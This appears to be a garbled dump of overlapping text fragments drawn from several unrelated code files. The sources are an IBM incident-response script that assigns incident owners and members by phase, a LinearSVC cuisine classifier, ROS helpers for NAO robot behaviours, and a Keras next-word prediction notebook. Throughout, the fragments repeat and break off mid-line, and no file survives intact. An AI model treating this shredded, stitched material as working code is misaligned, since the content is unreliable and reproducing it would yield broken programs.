change the owner of an incident, the previous owner", "removed, # but also automatically added to Members so they still has access", "to Members so they still has access to the incident. if incident.phase_id ==", "overwrite the existing list (which would remove members)! if incident.phase_id == 'Phase_Name': incident.members", "access to the incident. if incident.phase_id == 'Post-Incident': incident.owner_id = \"Group_Name\" elif incident.phase_id", "Phase': incident.owner_id = \"<EMAIL>\" # Based on the current phase name, add members", "Reserved. # Script to set incident owner and members based on Incident Phase.", "on the current phase name, set a single Group or User as Incident", "Incident Owner. # NOTE: # When you change the owner of an incident,", "members to the existing list, # don't just overwrite the existing list (which", "\"<EMAIL>\" # Based on the current phase name, add members to the incident.", "the existing list, # don't just overwrite the existing list (which would remove", "Other Phase': incident.owner_id = \"<EMAIL>\" # Based on the current phase name, add", "run when the phase changes. # Phase is a select field with API", "as # if incident.phase_id == \"value\": # Based on the current phase name,", "you change the owner of an incident, the previous owner is removed, #", "the incident. if incident.phase_id == 'Post-Incident': incident.owner_id = \"Group_Name\" elif incident.phase_id == 'Some", "# NOTE: # When you change the owner of an incident, the previous", "Rights Reserved. # Script to set incident owner and members based on Incident", "incident.owner_id = \"<EMAIL>\" # Based on the current phase name, add members to", "the new members to the existing list, # don't just overwrite the existing", "on the current phase name, add members to the incident. # The list", "when the phase changes. 
# Phase is a select field with API name", "to the existing list, # don't just overwrite the existing list (which would", "existing list, # don't just overwrite the existing list (which would remove members)!", "remove members)! if incident.phase_id == 'Phase_Name': incident.members = list(incident.members) + \\ [\"Group_Name\", \"<EMAIL>\"]", "# Based on the current phase name, set a single Group or User", "be run when the phase changes. # Phase is a select field with", "still has access to the incident. if incident.phase_id == 'Post-Incident': incident.owner_id = \"Group_Name\"", "# but also automatically added to Members so they still has access to", "Group or User as Incident Owner. # NOTE: # When you change the", "incident owner and members based on Incident Phase. # To be run when", "IBM Corp. 2010, 2020. All Rights Reserved. # Script to set incident owner", "a single Group or User as Incident Owner. # NOTE: # When you", "# if incident.phase_id == \"value\": # Based on the current phase name, set", "# don't just overwrite the existing list (which would remove members)! if incident.phase_id", "don't just overwrite the existing list (which would remove members)! if incident.phase_id ==", "incident.phase_id == 'Post-Incident': incident.owner_id = \"Group_Name\" elif incident.phase_id == 'Some Other Phase': incident.owner_id", "owner and members based on Incident Phase. # To be run when the", "'Post-Incident': incident.owner_id = \"Group_Name\" elif incident.phase_id == 'Some Other Phase': incident.owner_id = \"<EMAIL>\"", "members to the incident. # The list of members can include multiple groups", "they still has access to the incident. if incident.phase_id == 'Post-Incident': incident.owner_id =", "add members to the incident. # The list of members can include multiple", "previous owner is removed, # but also automatically added to Members so they", "incident, the previous owner is removed, # but also automatically added to Members", "is a select field with API name `phase_id`, # so the tests below", "name, add members to the incident. # The list of members can include", "2010, 2020. All Rights Reserved. # Script to set incident owner and members", "would remove members)! if incident.phase_id == 'Phase_Name': incident.members = list(incident.members) + \\ [\"Group_Name\",", "When you change the owner of an incident, the previous owner is removed,", "Copyright IBM Corp. 2010, 2020. All Rights Reserved. # Script to set incident", "# When you change the owner of an incident, the previous owner is", "can include multiple groups and individual users. # NOTE: # Here we **add**", "All Rights Reserved. # Script to set incident owner and members based on", "the owner of an incident, the previous owner is removed, # but also", "with API name `phase_id`, # so the tests below are written as #", "# To be run when the phase changes. # Phase is a select", "== \"value\": # Based on the current phase name, set a single Group", "== 'Post-Incident': incident.owner_id = \"Group_Name\" elif incident.phase_id == 'Some Other Phase': incident.owner_id =", "automatically added to Members so they still has access to the incident. if", "<filename>python3/incident/set-owner-and-members-by-phase.py # (c) Copyright IBM Corp. 2010, 2020. All Rights Reserved. 
# Script", "is removed, # but also automatically added to Members so they still has", "owner is removed, # but also automatically added to Members so they still", "= \"Group_Name\" elif incident.phase_id == 'Some Other Phase': incident.owner_id = \"<EMAIL>\" # Based", "changes. # Phase is a select field with API name `phase_id`, # so", "'Some Other Phase': incident.owner_id = \"<EMAIL>\" # Based on the current phase name,", "Based on the current phase name, set a single Group or User as", "owner of an incident, the previous owner is removed, # but also automatically", "just overwrite the existing list (which would remove members)! if incident.phase_id == 'Phase_Name':", "groups and individual users. # NOTE: # Here we **add** the new members", "new members to the existing list, # don't just overwrite the existing list", "phase name, set a single Group or User as Incident Owner. # NOTE:", "of an incident, the previous owner is removed, # but also automatically added", "to set incident owner and members based on Incident Phase. # To be", "include multiple groups and individual users. # NOTE: # Here we **add** the", "the current phase name, add members to the incident. # The list of", "\"Group_Name\" elif incident.phase_id == 'Some Other Phase': incident.owner_id = \"<EMAIL>\" # Based on", "Corp. 2010, 2020. All Rights Reserved. # Script to set incident owner and", "# Script to set incident owner and members based on Incident Phase. #", "users. # NOTE: # Here we **add** the new members to the existing", "incident. if incident.phase_id == 'Post-Incident': incident.owner_id = \"Group_Name\" elif incident.phase_id == 'Some Other", "the tests below are written as # if incident.phase_id == \"value\": # Based", "Incident Phase. # To be run when the phase changes. # Phase is", "on Incident Phase. # To be run when the phase changes. # Phase", "if incident.phase_id == \"value\": # Based on the current phase name, set a", "the incident. # The list of members can include multiple groups and individual", "below are written as # if incident.phase_id == \"value\": # Based on the", "# Here we **add** the new members to the existing list, # don't", "Here we **add** the new members to the existing list, # don't just", "list (which would remove members)! if incident.phase_id == 'Phase_Name': incident.members = list(incident.members) +", "API name `phase_id`, # so the tests below are written as # if", "elif incident.phase_id == 'Some Other Phase': incident.owner_id = \"<EMAIL>\" # Based on the", "single Group or User as Incident Owner. # NOTE: # When you change", "Script to set incident owner and members based on Incident Phase. # To", "Based on the current phase name, add members to the incident. # The", "The list of members can include multiple groups and individual users. # NOTE:", "= \"<EMAIL>\" # Based on the current phase name, add members to the", "Phase. # To be run when the phase changes. # Phase is a", "set a single Group or User as Incident Owner. # NOTE: # When", "based on Incident Phase. # To be run when the phase changes. #", "an incident, the previous owner is removed, # but also automatically added to", "multiple groups and individual users. # NOTE: # Here we **add** the new", "we **add** the new members to the existing list, # don't just overwrite", "incident.owner_id = \"Group_Name\" elif incident.phase_id == 'Some Other Phase': incident.owner_id = \"<EMAIL>\" #", "current phase name, set a single Group or User as Incident Owner. 
#", "a select field with API name `phase_id`, # so the tests below are", "`phase_id`, # so the tests below are written as # if incident.phase_id ==", "to the incident. if incident.phase_id == 'Post-Incident': incident.owner_id = \"Group_Name\" elif incident.phase_id ==", "== 'Some Other Phase': incident.owner_id = \"<EMAIL>\" # Based on the current phase", "# (c) Copyright IBM Corp. 2010, 2020. All Rights Reserved. # Script to", "# NOTE: # Here we **add** the new members to the existing list,", "NOTE: # Here we **add** the new members to the existing list, #", "incident. # The list of members can include multiple groups and individual users.", "individual users. # NOTE: # Here we **add** the new members to the", "tests below are written as # if incident.phase_id == \"value\": # Based on", "name, set a single Group or User as Incident Owner. # NOTE: #", "but also automatically added to Members so they still has access to the", "the phase changes. # Phase is a select field with API name `phase_id`,", "and members based on Incident Phase. # To be run when the phase", "# Based on the current phase name, add members to the incident. #", "also automatically added to Members so they still has access to the incident.", "of members can include multiple groups and individual users. # NOTE: # Here", "field with API name `phase_id`, # so the tests below are written as", "Owner. # NOTE: # When you change the owner of an incident, the", "To be run when the phase changes. # Phase is a select field", "members can include multiple groups and individual users. # NOTE: # Here we", "has access to the incident. if incident.phase_id == 'Post-Incident': incident.owner_id = \"Group_Name\" elif", "(which would remove members)! if incident.phase_id == 'Phase_Name': incident.members = list(incident.members) + \\", "\"value\": # Based on the current phase name, set a single Group or", "existing list (which would remove members)! if incident.phase_id == 'Phase_Name': incident.members = list(incident.members)", "so the tests below are written as # if incident.phase_id == \"value\": #", "so they still has access to the incident. if incident.phase_id == 'Post-Incident': incident.owner_id", "incident.phase_id == 'Some Other Phase': incident.owner_id = \"<EMAIL>\" # Based on the current", "written as # if incident.phase_id == \"value\": # Based on the current phase", "Members so they still has access to the incident. if incident.phase_id == 'Post-Incident':", "if incident.phase_id == 'Post-Incident': incident.owner_id = \"Group_Name\" elif incident.phase_id == 'Some Other Phase':", "(c) Copyright IBM Corp. 2010, 2020. All Rights Reserved. # Script to set", "# Phase is a select field with API name `phase_id`, # so the", "change the owner of an incident, the previous owner is removed, # but", "# so the tests below are written as # if incident.phase_id == \"value\":", "Phase is a select field with API name `phase_id`, # so the tests", "**add** the new members to the existing list, # don't just overwrite the", "added to Members so they still has access to the incident. if incident.phase_id" ]
[ "not self._has_fit: matrix, classes = self._matrix_database.make_train_matrix() self._svc = self._svc.fit(matrix, classes) print('Fitting complete...') self._has_fit", "class LinearSVClassifier(Classifier): def __init__(self, matrixdatabase): self._matrix_database = matrixdatabase self._has_fit = False self._svc =", "as SVC class LinearSVClassifier(Classifier): def __init__(self, matrixdatabase): self._matrix_database = matrixdatabase self._has_fit = False", "matrixdatabase self._has_fit = False self._svc = SVC(C=0.6, tol=1e-5, max_iter=10000, dual=False) def learn(self, ingredients,", "= SVC(C=0.6, tol=1e-5, max_iter=10000, dual=False) def learn(self, ingredients, cuisine): return def classify(self, ingredients):", "from classifier import Classifier from matrixdatabase import MatrixDatabase from sklearn.svm import LinearSVC as", "def learn(self, ingredients, cuisine): return def classify(self, ingredients): if not self._has_fit: matrix, classes", "self._has_fit: matrix, classes = self._matrix_database.make_train_matrix() self._svc = self._svc.fit(matrix, classes) print('Fitting complete...') self._has_fit =", "SVC class LinearSVClassifier(Classifier): def __init__(self, matrixdatabase): self._matrix_database = matrixdatabase self._has_fit = False self._svc", "matrixdatabase): self._matrix_database = matrixdatabase self._has_fit = False self._svc = SVC(C=0.6, tol=1e-5, max_iter=10000, dual=False)", "= self._svc.fit(matrix, classes) print('Fitting complete...') self._has_fit = True output = self._svc.predict(self._matrix_database.make_row_from_recipe(ingredients)) return output[0]", "dual=False) def learn(self, ingredients, cuisine): return def classify(self, ingredients): if not self._has_fit: matrix,", "= matrixdatabase self._has_fit = False self._svc = SVC(C=0.6, tol=1e-5, max_iter=10000, dual=False) def learn(self,", "import MatrixDatabase from sklearn.svm import LinearSVC as SVC class LinearSVClassifier(Classifier): def __init__(self, matrixdatabase):", "classifier ~78 pct accuracy, 0m10.881s execution time \"\"\" from classifier import Classifier from", "accuracy, 0m10.881s execution time \"\"\" from classifier import Classifier from matrixdatabase import MatrixDatabase", "self._has_fit = False self._svc = SVC(C=0.6, tol=1e-5, max_iter=10000, dual=False) def learn(self, ingredients, cuisine):", "classify(self, ingredients): if not self._has_fit: matrix, classes = self._matrix_database.make_train_matrix() self._svc = self._svc.fit(matrix, classes)", "learn(self, ingredients, cuisine): return def classify(self, ingredients): if not self._has_fit: matrix, classes =", "return def classify(self, ingredients): if not self._has_fit: matrix, classes = self._matrix_database.make_train_matrix() self._svc =", "def __init__(self, matrixdatabase): self._matrix_database = matrixdatabase self._has_fit = False self._svc = SVC(C=0.6, tol=1e-5,", "= self._matrix_database.make_train_matrix() self._svc = self._svc.fit(matrix, classes) print('Fitting complete...') self._has_fit = True output =", "classes = self._matrix_database.make_train_matrix() self._svc = self._svc.fit(matrix, classes) print('Fitting complete...') self._has_fit = True output", "linearsvclassifier.py Builds a linear support vector classifier ~78 pct accuracy, 0m10.881s execution time", "False self._svc = SVC(C=0.6, tol=1e-5, max_iter=10000, dual=False) def learn(self, ingredients, cuisine): return def", "= False self._svc = SVC(C=0.6, tol=1e-5, max_iter=10000, dual=False) def learn(self, ingredients, cuisine): return", "from 
matrixdatabase import MatrixDatabase from sklearn.svm import LinearSVC as SVC class LinearSVClassifier(Classifier): def", "SVC(C=0.6, tol=1e-5, max_iter=10000, dual=False) def learn(self, ingredients, cuisine): return def classify(self, ingredients): if", "ingredients): if not self._has_fit: matrix, classes = self._matrix_database.make_train_matrix() self._svc = self._svc.fit(matrix, classes) print('Fitting", "matrixdatabase import MatrixDatabase from sklearn.svm import LinearSVC as SVC class LinearSVClassifier(Classifier): def __init__(self,", "time \"\"\" from classifier import Classifier from matrixdatabase import MatrixDatabase from sklearn.svm import", "vector classifier ~78 pct accuracy, 0m10.881s execution time \"\"\" from classifier import Classifier", "self._matrix_database = matrixdatabase self._has_fit = False self._svc = SVC(C=0.6, tol=1e-5, max_iter=10000, dual=False) def", "from sklearn.svm import LinearSVC as SVC class LinearSVClassifier(Classifier): def __init__(self, matrixdatabase): self._matrix_database =", "__init__(self, matrixdatabase): self._matrix_database = matrixdatabase self._has_fit = False self._svc = SVC(C=0.6, tol=1e-5, max_iter=10000,", "import LinearSVC as SVC class LinearSVClassifier(Classifier): def __init__(self, matrixdatabase): self._matrix_database = matrixdatabase self._has_fit", "self._svc = SVC(C=0.6, tol=1e-5, max_iter=10000, dual=False) def learn(self, ingredients, cuisine): return def classify(self,", "max_iter=10000, dual=False) def learn(self, ingredients, cuisine): return def classify(self, ingredients): if not self._has_fit:", "ingredients, cuisine): return def classify(self, ingredients): if not self._has_fit: matrix, classes = self._matrix_database.make_train_matrix()", "def classify(self, ingredients): if not self._has_fit: matrix, classes = self._matrix_database.make_train_matrix() self._svc = self._svc.fit(matrix,", "support vector classifier ~78 pct accuracy, 0m10.881s execution time \"\"\" from classifier import", "linear support vector classifier ~78 pct accuracy, 0m10.881s execution time \"\"\" from classifier", "execution time \"\"\" from classifier import Classifier from matrixdatabase import MatrixDatabase from sklearn.svm", "tol=1e-5, max_iter=10000, dual=False) def learn(self, ingredients, cuisine): return def classify(self, ingredients): if not", "~78 pct accuracy, 0m10.881s execution time \"\"\" from classifier import Classifier from matrixdatabase", "<gh_stars>0 \"\"\" linearsvclassifier.py Builds a linear support vector classifier ~78 pct accuracy, 0m10.881s", "pct accuracy, 0m10.881s execution time \"\"\" from classifier import Classifier from matrixdatabase import", "\"\"\" from classifier import Classifier from matrixdatabase import MatrixDatabase from sklearn.svm import LinearSVC", "Classifier from matrixdatabase import MatrixDatabase from sklearn.svm import LinearSVC as SVC class LinearSVClassifier(Classifier):", "sklearn.svm import LinearSVC as SVC class LinearSVClassifier(Classifier): def __init__(self, matrixdatabase): self._matrix_database = matrixdatabase", "LinearSVClassifier(Classifier): def __init__(self, matrixdatabase): self._matrix_database = matrixdatabase self._has_fit = False self._svc = SVC(C=0.6,", "a linear support vector classifier ~78 pct accuracy, 0m10.881s execution time \"\"\" from", "if not self._has_fit: matrix, classes = self._matrix_database.make_train_matrix() self._svc = self._svc.fit(matrix, classes) print('Fitting complete...')", "MatrixDatabase from sklearn.svm import LinearSVC as SVC 
class LinearSVClassifier(Classifier): def __init__(self, matrixdatabase): self._matrix_database", "matrix, classes = self._matrix_database.make_train_matrix() self._svc = self._svc.fit(matrix, classes) print('Fitting complete...') self._has_fit = True", "LinearSVC as SVC class LinearSVClassifier(Classifier): def __init__(self, matrixdatabase): self._matrix_database = matrixdatabase self._has_fit =", "self._svc = self._svc.fit(matrix, classes) print('Fitting complete...') self._has_fit = True output = self._svc.predict(self._matrix_database.make_row_from_recipe(ingredients)) return", "Builds a linear support vector classifier ~78 pct accuracy, 0m10.881s execution time \"\"\"", "cuisine): return def classify(self, ingredients): if not self._has_fit: matrix, classes = self._matrix_database.make_train_matrix() self._svc", "self._matrix_database.make_train_matrix() self._svc = self._svc.fit(matrix, classes) print('Fitting complete...') self._has_fit = True output = self._svc.predict(self._matrix_database.make_row_from_recipe(ingredients))", "classifier import Classifier from matrixdatabase import MatrixDatabase from sklearn.svm import LinearSVC as SVC", "\"\"\" linearsvclassifier.py Builds a linear support vector classifier ~78 pct accuracy, 0m10.881s execution", "0m10.881s execution time \"\"\" from classifier import Classifier from matrixdatabase import MatrixDatabase from", "import Classifier from matrixdatabase import MatrixDatabase from sklearn.svm import LinearSVC as SVC class" ]
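# A minimal way to exercise the lazy-fit flow above, using a hypothetical stub
# in place of MatrixDatabase (the real make_train_matrix/make_row_from_recipe
# presumably build ingredient matrices from the recipe corpus):
import numpy as np

class StubMatrixDatabase(object):
    def make_train_matrix(self):
        # two tiny bag-of-ingredient rows with their cuisine labels
        return np.array([[1, 0, 1], [0, 1, 0]]), np.array(['italian', 'mexican'])

    def make_row_from_recipe(self, ingredients):
        return np.array([[1, 0, 1]])  # pretend-encode the query recipe

clf = LinearSVClassifier(StubMatrixDatabase())
print(clf.classify(['tomato', 'basil']))  # fits on the first call, then predicts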
[ "def wait_for_behaviour(name): while not rospy.is_shutdown(): if name not in su.call_service( \"/naoqi_driver/behaviour_manager/get_running_behaviors\", BehaviorManagerInfo, BehaviorManagerInfoRequest()", "BehaviorManagerControlRequest from nao_interaction_msgs.srv import BehaviorManagerInfo, BehaviorManagerInfoRequest def start_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/start_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) )", ") def toggle_behaviour(name): try: start_behaviour(name) except: pass try: stop_behaviour(name) except: pass def wait_for_behaviour(name):", "BehaviorManagerInfo, BehaviorManagerInfoRequest def start_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/start_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def stop_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/stop_behaviour\",", "BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def toggle_behaviour(name): try: start_behaviour(name) except: pass try: stop_behaviour(name) except: pass", "service_utils as su from nao_interaction_msgs.srv import BehaviorManagerControl, BehaviorManagerControlRequest from nao_interaction_msgs.srv import BehaviorManagerInfo, BehaviorManagerInfoRequest", "try: start_behaviour(name) except: pass try: stop_behaviour(name) except: pass def wait_for_behaviour(name): while not rospy.is_shutdown():", "su.call_service( \"/naoqi_driver/behaviour_manager/stop_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def toggle_behaviour(name): try: start_behaviour(name) except: pass try: stop_behaviour(name)", "BehaviorManagerInfoRequest def start_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/start_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def stop_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/stop_behaviour\", BehaviorManagerControl,", "import service_utils as su from nao_interaction_msgs.srv import BehaviorManagerControl, BehaviorManagerControlRequest from nao_interaction_msgs.srv import BehaviorManagerInfo,", "wait_for_behaviour(name): while not rospy.is_shutdown(): if name not in su.call_service( \"/naoqi_driver/behaviour_manager/get_running_behaviors\", BehaviorManagerInfo, BehaviorManagerInfoRequest() ).behaviors:", "try: stop_behaviour(name) except: pass def wait_for_behaviour(name): while not rospy.is_shutdown(): if name not in", "\"/naoqi_driver/behaviour_manager/start_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def stop_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/stop_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def toggle_behaviour(name):", "BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def stop_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/stop_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def toggle_behaviour(name): try:", "from nao_interaction_msgs.srv import BehaviorManagerControl, BehaviorManagerControlRequest from nao_interaction_msgs.srv import BehaviorManagerInfo, BehaviorManagerInfoRequest def start_behaviour(name): su.call_service(", "from nao_interaction_msgs.srv import BehaviorManagerInfo, BehaviorManagerInfoRequest def start_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/start_behaviour\", BehaviorManagerControl, 
BehaviorManagerControlRequest(name=name) ) def", "import BehaviorManagerInfo, BehaviorManagerInfoRequest def start_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/start_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def stop_behaviour(name): su.call_service(", "\"/naoqi_driver/behaviour_manager/stop_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def toggle_behaviour(name): try: start_behaviour(name) except: pass try: stop_behaviour(name) except:", "import BehaviorManagerControl, BehaviorManagerControlRequest from nao_interaction_msgs.srv import BehaviorManagerInfo, BehaviorManagerInfoRequest def start_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/start_behaviour\", BehaviorManagerControl,", "BehaviorManagerControl, BehaviorManagerControlRequest from nao_interaction_msgs.srv import BehaviorManagerInfo, BehaviorManagerInfoRequest def start_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/start_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name)", "def stop_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/stop_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def toggle_behaviour(name): try: start_behaviour(name) except: pass", "not rospy.is_shutdown(): if name not in su.call_service( \"/naoqi_driver/behaviour_manager/get_running_behaviors\", BehaviorManagerInfo, BehaviorManagerInfoRequest() ).behaviors: return else:", "stop_behaviour(name) except: pass def wait_for_behaviour(name): while not rospy.is_shutdown(): if name not in su.call_service(", "def start_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/start_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def stop_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/stop_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name)", "while not rospy.is_shutdown(): if name not in su.call_service( \"/naoqi_driver/behaviour_manager/get_running_behaviors\", BehaviorManagerInfo, BehaviorManagerInfoRequest() ).behaviors: return", ") def stop_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/stop_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def toggle_behaviour(name): try: start_behaviour(name) except:", "pass try: stop_behaviour(name) except: pass def wait_for_behaviour(name): while not rospy.is_shutdown(): if name not", "su.call_service( \"/naoqi_driver/behaviour_manager/start_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def stop_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/stop_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def", "import rospy import service_utils as su from nao_interaction_msgs.srv import BehaviorManagerControl, BehaviorManagerControlRequest from nao_interaction_msgs.srv", "rospy.is_shutdown(): if name not in su.call_service( \"/naoqi_driver/behaviour_manager/get_running_behaviors\", BehaviorManagerInfo, BehaviorManagerInfoRequest() ).behaviors: return else: rospy.sleep(.01)", "except: pass def wait_for_behaviour(name): while not rospy.is_shutdown(): if name not in su.call_service( \"/naoqi_driver/behaviour_manager/get_running_behaviors\",", "stop_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/stop_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def 
toggle_behaviour(name): try: start_behaviour(name) except: pass try:", "rospy import service_utils as su from nao_interaction_msgs.srv import BehaviorManagerControl, BehaviorManagerControlRequest from nao_interaction_msgs.srv import", "BehaviorManagerControlRequest(name=name) ) def stop_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/stop_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def toggle_behaviour(name): try: start_behaviour(name)", "def toggle_behaviour(name): try: start_behaviour(name) except: pass try: stop_behaviour(name) except: pass def wait_for_behaviour(name): while", "start_behaviour(name) except: pass try: stop_behaviour(name) except: pass def wait_for_behaviour(name): while not rospy.is_shutdown(): if", "su from nao_interaction_msgs.srv import BehaviorManagerControl, BehaviorManagerControlRequest from nao_interaction_msgs.srv import BehaviorManagerInfo, BehaviorManagerInfoRequest def start_behaviour(name):", "start_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/start_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def stop_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/stop_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) )", "as su from nao_interaction_msgs.srv import BehaviorManagerControl, BehaviorManagerControlRequest from nao_interaction_msgs.srv import BehaviorManagerInfo, BehaviorManagerInfoRequest def", "nao_interaction_msgs.srv import BehaviorManagerControl, BehaviorManagerControlRequest from nao_interaction_msgs.srv import BehaviorManagerInfo, BehaviorManagerInfoRequest def start_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/start_behaviour\",", "except: pass try: stop_behaviour(name) except: pass def wait_for_behaviour(name): while not rospy.is_shutdown(): if name", "pass def wait_for_behaviour(name): while not rospy.is_shutdown(): if name not in su.call_service( \"/naoqi_driver/behaviour_manager/get_running_behaviors\", BehaviorManagerInfo,", "BehaviorManagerControlRequest(name=name) ) def toggle_behaviour(name): try: start_behaviour(name) except: pass try: stop_behaviour(name) except: pass def", "nao_interaction_msgs.srv import BehaviorManagerInfo, BehaviorManagerInfoRequest def start_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/start_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def stop_behaviour(name):", "toggle_behaviour(name): try: start_behaviour(name) except: pass try: stop_behaviour(name) except: pass def wait_for_behaviour(name): while not" ]
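# Hypothetical usage sketch, assuming a running naoqi_driver and the helpers
# above; the behaviour name is illustrative, not taken from the source.
if __name__ == "__main__":
    rospy.init_node("behaviour_demo")
    start_behaviour("animations/Stand/Gestures/Hey_1")
    wait_for_behaviour("animations/Stand/Gestures/Hey_1")  # returns once it stops running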
[ "np.argmax(prediction[-1]) item += ' ' + vocabulary[idx] print(text + ' --> ' +", "# print(X_train[:10]) # print(y_train[:10]) # print(X_test[:10]) # print(y_test[:10]) \"\"\"## **Embeddings!**\"\"\" # Import the", "X = [] y = [] for c in lines: xxxx = c.replace('\\n','').split('", "learning and Machine learning _common terms_. \"\"\" # Storing data vocabulary = numpy.array(vocabulary)", "for strings, texts in enumerate(vocabulary): primary_store[texts] = strings # PREVIEW OUTPUT :: #", "Download data from Google drive ''' ORIGINAL DATASET URL: https://raw.githubusercontent.com/maxim5/stanford-tensorflow-tutorials/master/data/arxiv_abstracts.txt ''' url =", "# len(vocabulary) # Splitting data into Train sets and test sets X =", "version 4) # This will take a while but won't be long :)", "# Storing data vocabulary = numpy.array(vocabulary) numpy.save('./vocabulary.npy', vocabulary) model.save('./NWP-USE') ## END OF NOTEBOOK", "lower case # PREVIEW OUTPUT :: # print(lines[0][:100]) # len(lines) # Generate an", "# print(y_test[:10]) \"\"\"## **Embeddings!**\"\"\" # Import the Universal Sentence Encoder's TF Hub module", "# len(lines) # Generate an list of single/independent words vocabulary = list(set(' '.join(lines).replace('\\n','').split('", "enumerate(vocabulary): primary_store[texts] = strings # PREVIEW OUTPUT :: # print(vocabulary[:50]) # len(vocabulary) #", "K from keras.layers.recurrent import LSTM from keras.layers import Dense, Activation from keras.callbacks import", "all predicted words will be based on Deep learning and Machine learning _common", "# **Google drive for local storage** _NB: All comments are written to facilitate", "model, that the **Current User** may be less fatigued and see beauty in", "collection of words text_collection = ['deep convolutional', 'simple and effective', 'a nonconvex', 'a']", "will take a while but won't be long :) module_url = \"https://tfhub.dev/google/universal-sentence-encoder/4\" appreciate", "model.add(Dense(units=len(vocabulary), activation = 'softmax')) model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc']) model.summary() # Training the model. model.fit(X_train,", "+ item.split(' ')[-1] + '\\n') # Tests - please feel free to explore", "= ['deep convolutional', 'simple and effective', 'a nonconvex', 'a'] next_word(text_collection) \"\"\"## **For the", "# print(X_test[:10]) # print(y_test[:10]) # print(X_train.shape, X_test.shape, y_test.shape, y_train.shape) \"\"\"# **Building the model**\"\"\"", "module_url = \"https://tfhub.dev/google/universal-sentence-encoder/4\" appreciate = hub.load(module_url) # Making it easier - Function for", "**Google drive for local storage** _NB: All comments are written to facilitate smooth", "utf-8 -*- \"\"\"Next-Word Prediction using Universal Sentence Encoder.ipynb Automatically generated by Colaboratory. 
Original", "numpy.array(y_test) y_train = numpy.array(y_train) # PREVIEW OUTPUT :: # print(X_train[:10]) # print(y_train[:10]) #", "next_word(single_text) # Testing on a collection of words text_collection = ['deep convolutional', 'simple", "Generate Y from the Vocabulary # yyyy[primary_store[xxxx[-1]]] = 1 yyyy[primary_store[xxxx[-1]]] = 1 y.append(yyyy)", "primary_store = {} for strings, texts in enumerate(vocabulary): primary_store[texts] = strings # PREVIEW", "X_test.numpy() # PREVIEW OUTPUT :: # print(X_train[:10]) # print(y_train[:10]) # print(X_test[:10]) # print(y_test[:10])", "= X_test.numpy() # PREVIEW OUTPUT :: # print(X_train[:10]) # print(y_train[:10]) # print(X_test[:10]) #", "User** may be less fatigued and see beauty in the good work._ Uncomment", "magic to ensure Python compatibility. # This cell will prompt an external url", "= \"https://tfhub.dev/google/universal-sentence-encoder/4\" appreciate = hub.load(module_url) # Making it easier - Function for embedding", "validation_data=(X_test, y_test), callbacks=[LambdaCallback()]) \"\"\"#**Unto the tests!**\"\"\" # Create function to predict and show", "terms_. \"\"\" # Storing data vocabulary = numpy.array(vocabulary) numpy.save('./vocabulary.npy', vocabulary) model.save('./NWP-USE') ## END", "random_state=42) y_test = numpy.array(y_test) y_train = numpy.array(y_train) # PREVIEW OUTPUT :: # print(X_train[:10])", "so all predicted words will be based on Deep learning and Machine learning", "output = 'corpus.txt' gdown.download(url, output, quiet=False) # sentence_length = 40 # Read local", "= model.predict(x=embed([item]).numpy()) idx = np.argmax(prediction[-1]) item += ' ' + vocabulary[idx] print(text +", "item in collection: text = item for i in range(extent): prediction = model.predict(x=embed([item]).numpy())", "Google Drive from google.colab import drive drive.mount(\"/gdrive\") # %ls \"\"\"# **Import ***\"\"\" #", "item + '\\nNEXT WORD: ' + item.split(' ')[-1] + '\\n') # Tests -", "This will take a while but won't be long :) module_url = \"https://tfhub.dev/google/universal-sentence-encoder/4\"", "import LambdaCallback from keras.utils.data_utils import get_file from keras.layers.embeddings import Embedding from sklearn.model_selection import", "y_test.shape, y_train.shape) \"\"\"# **Building the model**\"\"\" model = Sequential() # model.add(Embedding(input_dim=len(vocabulary), output_dim=100)) model", "y_test), callbacks=[LambdaCallback()]) 